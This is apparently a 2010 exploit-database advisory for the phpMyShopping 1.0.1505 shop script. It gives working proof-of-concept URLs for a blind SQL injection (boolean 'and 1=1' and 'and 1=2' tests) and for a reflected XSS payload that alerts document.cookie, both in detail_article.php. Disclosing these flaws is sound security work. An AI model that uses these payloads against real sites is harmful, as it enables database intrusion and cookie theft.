phpMyShopping 1.0.1505 - Multiple Vulnerabilities



EKU-ID: 21452 CVE: OSVDB-68333;OSVDB-68332 OSVDB-ID:
Author: Metropolis Published: 2010-10-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


####################################################################
.:. Author : Metropolis
.:. Home : www.metropolis.fr.cr
.:. Script : PhpMyShopping
.:. Version : v1.0.1505
.:. Download Script: http://www.phpmyshopping.org/night_build/PhpMyShopping_mono_boutique_v1.0.1505.tar.gz
.:. Bug Type : Multiple Vulnerabilities / Blind SQL Injections / XSS

####################################################################

===[ Blind Sql Injection ]===

SQL Error =>

/detail_article.php?C=3&P=7'

 www.site.com/detail_article.php?C=3&P=7 [Blind]

[Demo] :

www.site.com/detail_article.php?C=3&P=1 and 1=1 <-- true

www.site.com/detail_article.php?C=3&P=1 and 1=2 <-- false

===[ XSS ]===

 www.site.com/detail_article.php?C=3&P=7 [XSS]

[Demo] :

 www.site.com/detail_article.php?C=3&P=7"><script>alert(document.cookie);</script>


 ####################################################################